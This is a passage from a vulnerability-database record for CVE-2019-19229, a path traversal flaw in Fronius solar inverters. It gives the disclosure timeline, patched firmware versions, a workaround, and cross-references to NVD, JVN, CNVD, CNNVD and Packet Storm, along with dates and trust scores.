timeline:\n------------------------\n2018-11-05: Contacting vendor through contact@fronius.com, requesting\n security contact\n2018-11-06: Vendor replies and confirms security issues\n2018-12-03: Meeting with vendor to discuss security issues\n2019-01 - 2019-11: Multiple telcos discussing Fronius\u0027 rollout plan and fixes\n2019-03-18: Release of version 3.12.5 (HM 1.10.5) which fixes the path traversal vulnerability\n2019-07-30: Release of version 3.14.1 (HM 1.12.1) which fixes many of the other reported issues\n2019-08 
- 2019-11: Testing \u0026 Fleet update to version 3.14.1 (HM 1.12.1)\n2019-12-03: Coordinated release of security advisory\n\n\nSolution:\n---------\nThe vendor provides a patched firmware via their download portal. Visit\nthe download page and search for \"firmware update\" and choose the\n\"Fronius Solar.update Datamanager V3.14.1-10\" firmware. \n\nThe new version v3.14.1 (HM 1.12.1) which contains most of the security fixes can be\ndownloaded directly as well:\nhttps://www.fronius.com/~/downloads/Solar%20Energy/Firmware/SE_FW_Fronius_Solar.update_Datamanager_EN.zip\n\nSome of the identified vulnerabilities (e.g. issue 1 and parts of 4) cannot be fixed\nin the current solar inverter product/software generation. \n\n\nWorkaround:\n-----------\nRestrict network access to the device as much as possible and disable port forwarding\nfrom the Internet. Fronius Solar.Web access is still possible. \n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\n\nSEC Consult\nEurope | Asia | North America\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It\nensures the continued knowledge gain of SEC Consult in the field of network\nand application security to stay ahead of the attacker. The SEC Consult\nVulnerability Lab supports high-quality penetration testing and the evaluation\nof new offensive and defensive technologies for our customers. Hence our\ncustomers obtain the most current information about vulnerabilities and valid\nrecommendation about the risk profile of new technologies. 
\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://www.sec-consult.com/en/career/index.html\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://www.sec-consult.com/en/contact/index.html\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF T. Weber / @2019\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-19229"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "PACKETSTORM",
"id": "155562"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "155562",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2019-19229",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-45163",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "PACKETSTORM",
"id": "155562"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"id": "VAR-201912-1533",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
}
]
},
"last_update_date": "2024-11-23T22:41:16.744000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.fronius.com/en"
},
{
"title": "Patch for Fronius Solar Inverter Series path traversal vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/194039"
},
{
"title": "Fronius Solar Inverter Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=105250"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/155562/fronius-solar-inverter-series-insecure-communication-path-traversal.html"
},
{
"trust": 2.2,
"url": "https://seclists.org/bugtraq/2019/dec/5"
},
{
"trust": 1.6,
"url": "https://sec-consult.com/en/blog/advisories/multiple-vulnerabilites-in-fronius-solar-inverter-series-cve-2019-19229-cve-2019-19228/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19229"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19229"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html"
},
{
"trust": 0.1,
"url": "http://\u003cip-address\u003e/admincgi-bin/service.fcgi"
},
{
"trust": 0.1,
"url": "https://www.fronius.com/~/downloads/solar%20energy/firmware/se_fw_fronius_solar.update_datamanager_en.zip"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com"
},
{
"trust": 0.1,
"url": "https://www.fronius.com"
},
{
"trust": 0.1,
"url": "http://www.fronius.com/en/about-fronius/company-values"
},
{
"trust": 0.1,
"url": "https://twitter.com/sec_consult"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/contact/index.html"
},
{
"trust": 0.1,
"url": "http://blog.sec-consult.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19228"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/career/index.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "PACKETSTORM",
"id": "155562"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"db": "PACKETSTORM",
"id": "155562"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"date": "2019-12-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"date": "2019-12-04T23:31:06",
"db": "PACKETSTORM",
"id": "155562"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"date": "2019-12-04T19:15:11.893000",
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-45163"
},
{
"date": "2019-12-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-013067"
},
{
"date": "2019-12-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201912-185"
},
{
"date": "2024-11-21T04:34:22.627000",
"db": "NVD",
"id": "CVE-2019-19229"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Fronius Solar Inverter Path traversal vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013067"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-185"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.